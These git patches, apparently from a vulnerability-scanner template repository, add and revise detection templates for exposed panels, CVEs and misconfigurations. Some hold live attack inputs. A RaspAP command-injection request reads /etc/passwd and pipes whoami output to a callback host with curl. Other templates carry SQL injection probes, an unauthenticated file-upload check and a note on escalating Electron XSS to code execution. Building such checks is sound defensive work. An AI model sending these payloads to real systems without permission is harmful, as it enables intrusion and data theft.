file changed, 36 insertions(+) create mode 100644 misconfiguration/ibm-friendly-path-exposure.yaml diff --git a/misconfiguration/ibm-friendly-path-exposure.yaml b/misconfiguration/ibm-friendly-path-exposure.yaml new file mode 100644 index 0000000000..201e84d9dd --- /dev/null +++ b/misconfiguration/ibm-friendly-path-exposure.yaml @@ -0,0 +1,36 @@ +id: ibm-friendly-path-exposure + +info: + name: IBM Websphere Friendly Path Exposure + author: clarkvoss + severity: medium + description: Finds friendly path exposed that can be used to access signup page and create new user accounts. + reference: https://clarkvoss.medium.com/how-to-harpon-big-blue-c163722638d8 + tags: ibm,exposure + +requests: + - method: GET + path: + - "{{BaseURL}}/wps/portal/client/welcome/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2" + - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziHd3DQgMNnM3N_M1DjA08PX0NgoNcnQwt3Ez1wwkpiAJKG-AAjgb6BbmhigBypoQ7/dz/d5/L2dBISEvZ0FBIS9nQSEh/?uri=nm:oid:Z6_00000000000000A0BR2B300GG2" + - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBQfxRYSYCHh5mHoYWBj7-RL1DC1y3M2NXCx9jA3RiqAI8ZBbmhEQaZjooABQv7ag!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/#Z7_00000000000000A0BR2B300IO0" + - "{{BaseURL}}/wps/portal/!ut/p/z1/04_Sj9CPykssy0xPLMnMz0vMAfIjo8ziDVCAo4FTkJGTsYGBu7uRfjhYgaN7WGiggbO5mb95iLGBp6evQXCQq5OhhZupfhSGfmSToPrxWEBAf0FuaCgAb7VcBA!!/dz/d5/L2dBISEvZ0FBIS9nQSEh/dz/d5/L0lJSkdKSUtVSklKQ2dwUkNncFJBL29Od3dBQUFZUUFBRUl3UWxDVTVBQUdNSUtTcEtGTFJ0R0ZvIS80TmxFTklVTVFuRmR1WXBNaFFUVWs1Q2ltcHBBL1o2XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwR1YwL1o3XzAwMDAwMDAwMDAwMDAwQTBCUjJCMzAwSU8wL25vcm1hbC9PQ04vWjZfMDAwMDAwMDAwMDAwMDBBMEJSMkIzMDBHRzIvYW8vdGht/#Z7_00000000000000A0BR2B300IO0" + - "{{BaseURL}}/wps/portal/!ut/p/z1/pZHBDoIwDIYfqZVF4DoIEg5KBEHWi9mBIAnbjCEefHqH8SARJNGe2qRf_78tEFRAWt7aRvat0bKztSD3hKPgGGROwBDjEuH4bOBxWewx9NzUOzBMki3mWRSs_M0a6IN_n_Ti5wRiZ4Kf0J9r8PEXfmTwL_0Sl_YXlvfm-CRFKLS5KvuJHAgoDXeL9wKSBkR_VkPa6QZEra1N-rrJcKglqxdV2KjuEVM-czP-AKyJL-g!/dz/d5/L2dBISEvZ0FBIS9nQSEh/#Z7_00000000000000A0BR2B300IO0" + + stop-at-first-match: true + matchers-condition: and + matchers: + - type: word + words: + - "Friendly path" + - "IBM WebSphere Portal" + part: body + + - type: word + words: + - "text/html" + part: header + + - type: status + status: + - 200 \ No newline at end of file From 90b924199d8548dd85387e1cca05818ba32a21d1 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Sun, 3 Oct 2021 19:37:22 +0700 Subject: [PATCH 2719/4083] Create CVE-2021-33357.yaml --- cves/2021/CVE-2021-33357.yaml | 23 +++++++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100644 cves/2021/CVE-2021-33357.yaml diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml new file mode 100644 index 0000000000..779f03598c --- /dev/null +++ b/cves/2021/CVE-2021-33357.yaml @@ -0,0 +1,23 @@ +id: CVE-2021-33357 + +info: + name: RaspAP RCE + author: pikpikcu + severity: critical + reference: + - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 + - hhttps://www.security-database.com/detail.php?alert=CVE-2021-33357 + - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf + description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. + tags: cve,cve2021,rce,raspap + +requests: + - method: GET + path: + - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=cat%20/etc/passwd" + + matchers-condition: and + matchers: + - type: regex + regex: + - "root:[x*]:0:0:" From 8a83866a7e6a5d44b28d420a44c533b4e56dcba6 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 3 Oct 2021 09:24:50 -0500 Subject: [PATCH 2720/4083] Create contentkeeper-detection.yaml --- exposed-panels/contentkeeper-detection.yaml | 29 +++++++++++++++++++++ 1 file changed, 29 insertions(+) create mode 100644 exposed-panels/contentkeeper-detection.yaml diff --git a/exposed-panels/contentkeeper-detection.yaml b/exposed-panels/contentkeeper-detection.yaml new file mode 100644 index 0000000000..a452c8c9ec --- /dev/null +++ b/exposed-panels/contentkeeper-detection.yaml @@ -0,0 +1,29 @@ +id: contentkeeper-detection + +info: + name: ContentKeeper Cloud Detection + description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learni> + reference: https://www.contentkeeper.com/ + author: geeknik + severity: info + tags: contentkeeper,panel + +requests: + - method: GET + path: + - "{{BaseURL}}/cgi-bin/ck/domenu.cgi" + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "Copyright © 2000 – 2021, ContentKeeper Technologies" + - "ContentKeeper.com" + condition: and + - type: word + words: + - "text/html" + part: header From 61aeb685ab8a49c627de3e1f7d35314e6ae062c4 Mon Sep 17 00:00:00 2001 From: Geeknik Labs <466878+geeknik@users.noreply.github.com> Date: Sun, 3 Oct 2021 09:26:23 -0500 Subject: [PATCH 2721/4083] Update contentkeeper-detection.yaml --- exposed-panels/contentkeeper-detection.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/exposed-panels/contentkeeper-detection.yaml b/exposed-panels/contentkeeper-detection.yaml index a452c8c9ec..a9946b3ba4 100644 --- a/exposed-panels/contentkeeper-detection.yaml +++ b/exposed-panels/contentkeeper-detection.yaml @@ -2,7 +2,7 @@ id: contentkeeper-detection info: name: ContentKeeper Cloud Detection - description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learni> + description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning. reference: https://www.contentkeeper.com/ author: geeknik severity: info From b2fa48e6a4e192b47ad9192d1c63a654e9f59c7c Mon Sep 17 00:00:00 2001 From: sandeep Date: Sun, 3 Oct 2021 22:41:42 +0530 Subject: [PATCH 2722/4083] Update CVE-2021-33357.yaml --- cves/2021/CVE-2021-33357.yaml | 7 +++---- 1 file changed, 3 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index 779f03598c..6adbeb138a 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -16,8 +16,7 @@ requests: path: - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=cat%20/etc/passwd" - matchers-condition: and matchers: - - type: regex - regex: - - "root:[x*]:0:0:" + - type: regex + regex: + - "root:.*:0:0" From 23c1cf45ce99b831e480a2e3b5e26b3803cf82f1 Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 4 Oct 2021 02:07:21 +0530 Subject: [PATCH 2723/4083] Added working payload --- cves/2021/CVE-2021-33357.yaml | 24 +++++++++++++++++------- 1 file changed, 17 insertions(+), 7 deletions(-) diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index 6adbeb138a..0fd8e86128 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -1,22 +1,32 @@ id: CVE-2021-33357 info: - name: RaspAP RCE - author: pikpikcu + name: RaspAP <= 2.6.5 - Remote Code Execution + author: pikpikcu,pdteam severity: critical reference: - - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 - - hhttps://www.security-database.com/detail.php?alert=CVE-2021-33357 + - https://checkmarx.com/blog/chained-raspap-vulnerabilities-grant-root-level-access/ - https://gist.github.com/omriinbar/52c000c02a6992c6ce68d531195f69cf + - https://nvd.nist.gov/vuln/detail/CVE-2021-33357 + - https://github.com/RaspAP/raspap-webgui description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. - tags: cve,cve2021,rce,raspap + tags: cve,cve2021,rce,raspap,oob requests: - method: GET path: - - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=cat%20/etc/passwd" + - "{{BaseURL}}/ajax/networking/get_netcfg.php?iface=;curl%20http://{{interactsh-url}}/`whoami`;" matchers: + - type: word + part: interactsh_protocol + name: http + words: + - "http" + + extractors: - type: regex + part: interactsh_request + group: 1 regex: - - "root:.*:0:0" + - 'GET \/([a-z-]+) HTTP' \ No newline at end of file From 6ab5ea4a63194e8d32c44d9f417f6bf37cdc255a Mon Sep 17 00:00:00 2001 From: sandeep Date: Mon, 4 Oct 2021 02:10:33 +0530 Subject: [PATCH 2724/4083] Update CVE-2021-33357.yaml --- cves/2021/CVE-2021-33357.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index 0fd8e86128..e9dd78403b 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -20,7 +20,6 @@ requests: matchers: - type: word part: interactsh_protocol - name: http words: - "http" From 937db784ee4ec54a35412c1c9d1215679e2e4b17 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Sun, 3 Oct 2021 20:44:21 +0000 Subject: [PATCH 2725/4083] Auto Generated CVE annotations [Sun Oct 3 20:44:21 UTC 2021] :robot: --- cves/2021/CVE-2021-33357.yaml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/cves/2021/CVE-2021-33357.yaml b/cves/2021/CVE-2021-33357.yaml index e9dd78403b..6a55383739 100644 --- a/cves/2021/CVE-2021-33357.yaml +++ b/cves/2021/CVE-2021-33357.yaml @@ -11,6 +11,11 @@ info: - https://github.com/RaspAP/raspap-webgui description: RaspAP 2.6 to 2.6.5 in the "iface" GET parameter in /ajax/networking/get_netcfg.php, when the "iface" parameter value contains special characters such as ";" which enables an unauthenticated attacker to execute arbitrary OS commands. tags: cve,cve2021,rce,raspap,oob + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H + cvss-score: 9.80 + cve-id: CVE-2021-33357 + cwe-id: CWE-78 requests: - method: GET From 9e2a7aaeaeee068cb03143a604e3d13d4c4326f0 Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Sun, 3 Oct 2021 21:46:05 +0100 Subject: [PATCH 2726/4083] Create node-integration.yaml --- file/electron/node-integration.yaml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) create mode 100644 file/electron/node-integration.yaml diff --git a/file/electron/node-integration.yaml b/file/electron/node-integration.yaml new file mode 100644 index 0000000000..9d49a80475 --- /dev/null +++ b/file/electron/node-integration.yaml @@ -0,0 +1,20 @@ +id: node-integration-enabled + +info: + name: Node Integration Enabled + author: me9187 + severity: critical + tags: electron,file + reference: https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/ + # nodeIntegration in Electron Applications means you can turn XSS into RCE by calling require('child_process').exec('COMMAND'); + # https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps + +file: + - extensions: + - all + + matchers: + + - type: word + words: + - "nodeIntegration: true" From 12ab5cfad32e863b798731c3caf57e76dc579a91 Mon Sep 17 00:00:00 2001 From: Me9187 <78823654+Meeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeeee@users.noreply.github.com> Date: Sun, 3 Oct 2021 21:50:50 +0100 Subject: [PATCH 2727/4083] Update node-integration.yaml --- file/electron/node-integration.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/file/electron/node-integration.yaml b/file/electron/node-integration.yaml index 9d49a80475..d29f7935b4 100644 --- a/file/electron/node-integration.yaml +++ b/file/electron/node-integration.yaml @@ -17,4 +17,4 @@ file: - type: word words: - - "nodeIntegration: true" + - "nodeIntegration: true" From 10c6db887c1a7365e14d58a2e988ac955522b2a0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 18:17:45 +0530 Subject: [PATCH 2728/4083] Update and rename node-integration.yaml to node-integration-enabled.yaml --- ...node-integration.yaml => node-integration-enabled.yaml} | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) rename file/electron/{node-integration.yaml => node-integration-enabled.yaml} (60%) diff --git a/file/electron/node-integration.yaml b/file/electron/node-integration-enabled.yaml similarity index 60% rename from file/electron/node-integration.yaml rename to file/electron/node-integration-enabled.yaml index d29f7935b4..a2c58017d2 100644 --- a/file/electron/node-integration.yaml +++ b/file/electron/node-integration-enabled.yaml @@ -4,10 +4,11 @@ info: name: Node Integration Enabled author: me9187 severity: critical - tags: electron,file - reference: https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/ + reference: + - https://blog.yeswehack.com/yeswerhackers/exploitation/pentesting-electron-applications/ + - https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps + tags: electron,file,nodejs # nodeIntegration in Electron Applications means you can turn XSS into RCE by calling require('child_process').exec('COMMAND'); - # https://book.hacktricks.xyz/pentesting/pentesting-web/xss-to-rce-electron-desktop-apps file: - extensions: From fc52216989499984b1ee6214abcae045b3ed3be2 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 19:02:28 +0530 Subject: [PATCH 2729/4083] Update contentkeeper-detection.yaml --- exposed-panels/contentkeeper-detection.yaml | 8 +++++--- 1 file changed, 5 insertions(+), 3 deletions(-) diff --git a/exposed-panels/contentkeeper-detection.yaml b/exposed-panels/contentkeeper-detection.yaml index a9946b3ba4..9bd4f3bd06 100644 --- a/exposed-panels/contentkeeper-detection.yaml +++ b/exposed-panels/contentkeeper-detection.yaml @@ -2,10 +2,10 @@ id: contentkeeper-detection info: name: ContentKeeper Cloud Detection - description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning. - reference: https://www.contentkeeper.com/ author: geeknik severity: info + description: ContentKeeper Cloud is the next evolution of cloud filtering that provides schools a seamless and secure way to enable safer and more effective hybrid learning. + reference: https://www.contentkeeper.com/ tags: contentkeeper,panel requests: @@ -18,11 +18,13 @@ requests: - type: status status: - 200 + - type: word words: - - "Copyright © 2000 – 2021, ContentKeeper Technologies" + - "ContentKeeper Technologies" - "ContentKeeper.com" condition: and + - type: word words: - "text/html" From fcdbff79174f2d55f172710492dd88692b593abc Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 19:02:46 +0530 Subject: [PATCH 2730/4083] Update and rename contentkeeper-detection.yaml to contentkeeper-detect.yaml --- .../{contentkeeper-detection.yaml => contentkeeper-detect.yaml} | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) rename exposed-panels/{contentkeeper-detection.yaml => contentkeeper-detect.yaml} (96%) diff --git a/exposed-panels/contentkeeper-detection.yaml b/exposed-panels/contentkeeper-detect.yaml similarity index 96% rename from exposed-panels/contentkeeper-detection.yaml rename to exposed-panels/contentkeeper-detect.yaml index 9bd4f3bd06..b5b6a8daf5 100644 --- a/exposed-panels/contentkeeper-detection.yaml +++ b/exposed-panels/contentkeeper-detect.yaml @@ -1,4 +1,4 @@ -id: contentkeeper-detection +id: contentkeeper-detect info: name: ContentKeeper Cloud Detection From d4792bfa27f5bf5ba184614c1c5eb2ddb12defa0 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 19:18:55 +0530 Subject: [PATCH 2731/4083] Update okiko-sfiler-portal.yaml --- exposed-panels/okiko-sfiler-portal.yaml | 14 +++++++++++--- 1 file changed, 11 insertions(+), 3 deletions(-) diff --git a/exposed-panels/okiko-sfiler-portal.yaml b/exposed-panels/okiko-sfiler-portal.yaml index d9b363c180..bb30bebcb2 100644 --- a/exposed-panels/okiko-sfiler-portal.yaml +++ b/exposed-panels/okiko-sfiler-portal.yaml @@ -1,10 +1,10 @@ id: okiko-sfiler-portal info: - name: Detect OKIKO S-Filer Portal + name: OKIKO S-Filer Portal Detect author: johnk3r - reference: https://www.shodan.io/search?query=sfiler severity: info + reference: https://www.shodan.io/search?query=sfiler tags: okiko,panel requests: @@ -16,8 +16,16 @@ requests: matchers: - type: word words: - - "okiok" + - "S-Filer Portal - Login" part: body + - type: status status: - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'S\-Filer\/([A-Za-z 0-9.]+)<\/p>' From cff53ecea959848a46d403422ad0d86ff91e5020 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 19:26:04 +0530 Subject: [PATCH 2732/4083] Update and rename secmail-panel.yaml to secmail-detect.yaml --- exposed-panels/{secmail-panel.yaml => secmail-detect.yaml} | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) rename exposed-panels/{secmail-panel.yaml => secmail-detect.yaml} (79%) diff --git a/exposed-panels/secmail-panel.yaml b/exposed-panels/secmail-detect.yaml similarity index 79% rename from exposed-panels/secmail-panel.yaml rename to exposed-panels/secmail-detect.yaml index b3b68c21d3..19f7b21f8e 100644 --- a/exposed-panels/secmail-panel.yaml +++ b/exposed-panels/secmail-detect.yaml @@ -1,7 +1,7 @@ id: secmail-detect info: - name: Detect SecMail - secure email + name: SecMail - secure email Detect author: johnk3r severity: info reference: https://www.shodan.io/search?query=secmail @@ -16,8 +16,8 @@ requests: matchers: - type: word words: - - "requestKey.jsp" - part: body + - "Path=/SecMail" + part: header - type: status status: From 0f5d9ac24d194a5f3164cea1320dadbcd02643d4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 19:32:07 +0530 Subject: [PATCH 2733/4083] Update CVE-2021-41649.yaml --- cves/2021/CVE-2021-41649.yaml | 9 +++++---- 1 file changed, 5 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-41649.yaml b/cves/2021/CVE-2021-41649.yaml index b6ec73e729..084555f45d 100644 --- a/cves/2021/CVE-2021-41649.yaml +++ b/cves/2021/CVE-2021-41649.yaml @@ -6,25 +6,26 @@ info: severity: high description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /homeaction.php cat_id parameter. Using a post request does not sanitize the user input. reference: https://github.com/MobiusBinary/CVE-2021-41649 - tags: sqli,cve,cve2021 + tags: cve,cve2021,sqli requests: - method: POST path: - "{{BaseURL}}/homeaction.php" - body: | - cat_id=4'&get_seleted_Category=1 + body: "cat_id=4'&get_seleted_Category=1" + matchers-condition: and matchers: - type: word words: - - "Content-Type: text/html" + - "text/html" part: header - type: word words: - "Warning: mysqli_num_rows() expects parameter 1 to be" + - "xdebug-error xe-warning" part: body condition: and From 8492360296cb91b2c13d3827f7b42a5300e7305f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 19:34:16 +0530 Subject: [PATCH 2734/4083] Update CVE-2021-41648.yaml --- cves/2021/CVE-2021-41648.yaml | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/cves/2021/CVE-2021-41648.yaml b/cves/2021/CVE-2021-41648.yaml index 450098e959..3c2322f4f0 100644 --- a/cves/2021/CVE-2021-41648.yaml +++ b/cves/2021/CVE-2021-41648.yaml @@ -6,25 +6,27 @@ info: severity: high description: An un-authenticated SQL Injection exists in PuneethReddyHC online-shopping-system-advanced through the /action.php prId parameter. Using a post request does not sanitize the user input. reference: https://github.com/MobiusBinary/CVE-2021-41648 - tags: sqli,cve,cve2021 + tags: cve,cve2021,sqli requests: - method: POST path: - "{{BaseURL}}/action.php" - body: | - proId=1'&addToCart=1 + + body: "proId=1'&addToCart=1" + matchers-condition: and matchers: - type: word words: - - "Content-Type: text/html" + - "text/html" part: header - type: word words: - "Warning: mysqli_num_rows() expects parameter 1 to be" + - "xdebug-error xe-warning" part: body condition: and From 5620395c94b28df76eb953df1a389bd399bb2623 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 20:09:39 +0530 Subject: [PATCH 2735/4083] Update CVE-2021-1499.yaml --- cves/2021/CVE-2021-1499.yaml | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/cves/2021/CVE-2021-1499.yaml b/cves/2021/CVE-2021-1499.yaml index 69983db2f4..510c6c1087 100644 --- a/cves/2021/CVE-2021-1499.yaml +++ b/cves/2021/CVE-2021-1499.yaml @@ -2,18 +2,19 @@ id: CVE-2021-1499 info: name: Cisco HyperFlex HX Data Platform - File Upload Vulnerability - description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. author: gy741 severity: medium + description: A vulnerability in the web-based management interface of Cisco HyperFlex HX Data Platform could allow an unauthenticated, remote attacker to upload files to an affected device. This vulnerability is due to missing authentication for the upload function. An attacker could exploit this vulnerability by sending a specific HTTP request to an affected device. A successful exploit could allow the attacker to upload files to the affected device with the permissions of the tomcat8 user. reference: - https://swarm.ptsecurity.com/cisco-hyperflex-how-we-got-rce-through-login-form-and-other-findings/ - https://nvd.nist.gov/vuln/detail/CVE-2021-1499 - tags: cve,cve2021,cisco classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 + tags: cve,cve2021,cisco,fileupload + requests: - raw: From 9c89100c2d4a9ec10dc8458e9942aac1b616121e Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 21:36:06 +0530 Subject: [PATCH 2736/4083] Update CVE-2021-1499.yaml --- cves/2021/CVE-2021-1499.yaml | 7 ++++--- 1 file changed, 4 insertions(+), 3 deletions(-) diff --git a/cves/2021/CVE-2021-1499.yaml b/cves/2021/CVE-2021-1499.yaml index 510c6c1087..e7d3c3fe1b 100644 --- a/cves/2021/CVE-2021-1499.yaml +++ b/cves/2021/CVE-2021-1499.yaml @@ -13,7 +13,7 @@ info: cvss-score: 5.3 cve-id: CVE-2021-1499 cwe-id: CWE-306 - tags: cve,cve2021,cisco,fileupload + tags: cve,cve2021,cisco,fileupload,intrusive requests: @@ -48,6 +48,7 @@ requests: - type: word words: - - "result" - - "/tmp/passwd9" + - '{"result":' + - '"filename:' + - '/tmp/passwd9' condition: and From 74f0620a9fd44b1bf408976f1d7081f96d2a0822 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 22:09:12 +0530 Subject: [PATCH 2737/4083] Update axiom-digitalocean-key-exposure.yaml --- .../digitalocean/axiom-digitalocean-key-exposure.yaml | 10 +++++----- 1 file changed, 5 insertions(+), 5 deletions(-) diff --git a/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml index 2ac3268256..6b242bc568 100644 --- a/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml +++ b/exposures/tokens/digitalocean/axiom-digitalocean-key-exposure.yaml @@ -2,10 +2,10 @@ id: axiom-digitalocean-key-exposure info: name: DigitalOcean key exposure via Axiom - description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments, build and deploy repeatable infrastructure focussed on offensive and defensive security. - reference: https://github.com/pry0cc/axiom author: geeknik severity: critical + description: Axiom is a dynamic infrastructure framework to efficiently work with multi-cloud environments, build and deploy repeatable infrastructure focussed on offensive and defensive security. + reference: https://github.com/pry0cc/axiom tags: axiom,digitalocean,key,exposure requests: @@ -21,9 +21,9 @@ requests: - type: word words: - - "do_key" - - "region" - - "imageid" + - '"do_key"' + - '"region"' + - '"provider"' condition: and extractors: From ed07a9924230ecc7a8f9aef4936d8076298c34c4 Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Mon, 4 Oct 2021 22:20:00 +0530 Subject: [PATCH 2738/4083] Update CVE-2021-41826.yaml --- cves/2021/CVE-2021-41826.yaml | 3 ++- 1 file changed, 2 insertions(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-41826.yaml b/cves/2021/CVE-2021-41826.yaml index 1002552521..98cd0f66a4 100644 --- a/cves/2021/CVE-2021-41826.yaml +++ b/cves/2021/CVE-2021-41826.yaml @@ -23,8 +23,9 @@ requests: status: - 302 - 301 + condition: or - type: regex part: header words: - - '(?mi)(?:Location\s*?:\s*?)((?:https?:\/\/|\/\/?))?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*' + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' From 98f51394a70f7e92aaf330cb49e5e54c49e5ad60 Mon Sep 17 00:00:00 2001 From: meme-lord Date: Mon, 4 Oct 2021 18:20:43 +0100 Subject: [PATCH 2739/4083] Update CVE-2021-38314.yaml Added my blog post on how to PoC it to the references --- cves/2021/CVE-2021-38314.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2021/CVE-2021-38314.yaml b/cves/2021/CVE-2021-38314.yaml index bb3ddad58e..4eba6bd240 100644 --- a/cves/2021/CVE-2021-38314.yaml +++ b/cves/2021/CVE-2021-38314.yaml @@ -7,6 +7,7 @@ info: reference: - https://www.wordfence.com/blog/2021/09/over-1-million-sites-affected-by-redux-framework-vulnerabilities/ - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38314 + - https://blog.sorcery.ie/posts/redux_wordpress/ tags: cve,cve2021,wordpress,wp-plugin classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N From 3f22428a8cc07899680f915879d988aebd3b6da0 Mon Sep 17 00:00:00 2001 From: sandeep Date: Tue, 5 Oct 2021 02:30:50 +0530 Subject: [PATCH 2740/4083] directory update --- {apis => token-spray}/README.md | 7 ++++--- {apis => token-spray}/asana.yaml | 0 {apis => token-spray}/bingmaps.yaml | 0 {apis => token-spray}/bitly.yaml | 0 {apis => token-spray}/buildkite.yaml | 0 {apis => token-spray}/buttercms.yaml | 0 {apis => token-spray}/calendly.yaml | 0 {apis => token-spray}/circleci.yaml | 0 {apis => token-spray}/deviantart.yaml | 0 {apis => token-spray}/dropbox.yaml | 0 {apis => token-spray}/github.yaml | 0 {apis => token-spray}/google-autocomplete.yaml | 0 {apis => token-spray}/google-customsearch.yaml | 0 {apis => token-spray}/google-directions.yaml | 0 {apis => token-spray}/google-elevation.yaml | 0 {apis => token-spray}/google-fcm.yaml | 0 {apis => token-spray}/google-findplacefromtext.yaml | 0 {apis => token-spray}/google-gedistancematrix.yaml | 0 {apis => token-spray}/google-geocode.yaml | 0 {apis => token-spray}/google-geolocation.yaml | 0 {apis => token-spray}/google-mapsembed.yaml | 0 {apis => token-spray}/google-mapsembedadvanced.yaml | 0 {apis => token-spray}/google-nearbysearch.yaml | 0 {apis => token-spray}/google-nearestroads.yaml | 0 {apis => token-spray}/google-placedetails.yaml | 0 {apis => token-spray}/google-placesphoto.yaml | 0 {apis => token-spray}/google-playablelocations.yaml | 0 {apis => token-spray}/google-routetotraveled.yaml | 0 {apis => token-spray}/google-speedlimit.yaml | 0 {apis => token-spray}/google-staticmaps.yaml | 0 {apis => token-spray}/google-streetview.yaml | 0 {apis => token-spray}/google-timezone.yaml | 0 {apis => token-spray}/googlet-extsearchplaces.yaml | 0 {apis => token-spray}/heroku.yaml | 0 {apis => token-spray}/hubspot.yaml | 0 {apis => token-spray}/instagram.yaml | 0 {apis => token-spray}/ipstack.yaml | 0 {apis => token-spray}/iterable.yaml | 0 {apis => token-spray}/jumpcloud.yaml | 0 {apis => token-spray}/lokalise.yaml | 0 {apis => token-spray}/loqate.yaml | 0 {apis => token-spray}/mailchimp.yaml | 0 